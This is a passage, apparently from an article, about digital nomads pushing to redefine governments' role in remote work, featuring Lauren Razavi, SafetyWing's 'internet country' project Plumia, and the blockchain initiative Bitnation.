The opportunities are so numerous, solutions exist just to help you "amenity shop" the perfect country, Airbnb style. Some ambitious nomads, like activist and author Lauren Razavi, have also started to advocate for their rights as global citizens and the future of borderless work. Remote workers like Lauren and us want to completely redefine the role governments play in digital nomads' movement and regulation. By laying the foundation for the next generation of travel and work, an internet country called Plumia wants to build the alternative using decentralized technologies, while also working with countries and institutions on policies that achieve common goals. Begun as an independent project by remote-first travel insurance company SafetyWing, Plumia's plan is to combine the infrastructure for living anywhere with the functions of a geographic country. Blockchain enthusiasts are also testing an approach that begs the question: are traditional countries still necessary?

Bitnation advocates for decentralizing authority by empowering voluntary participation and peer-to-peer agreements. Currently in development, Plumia is focusing on developing member-focused services and content. Verifying a digital identity, maintaining a 'permanent address' whilst on the move, switching service providers and jurisdictions on the fly, complying with complicated tax and labor laws — these are all thorny issues to solve.

Initiatives like Plumia are jumping into quite an active ring, however.
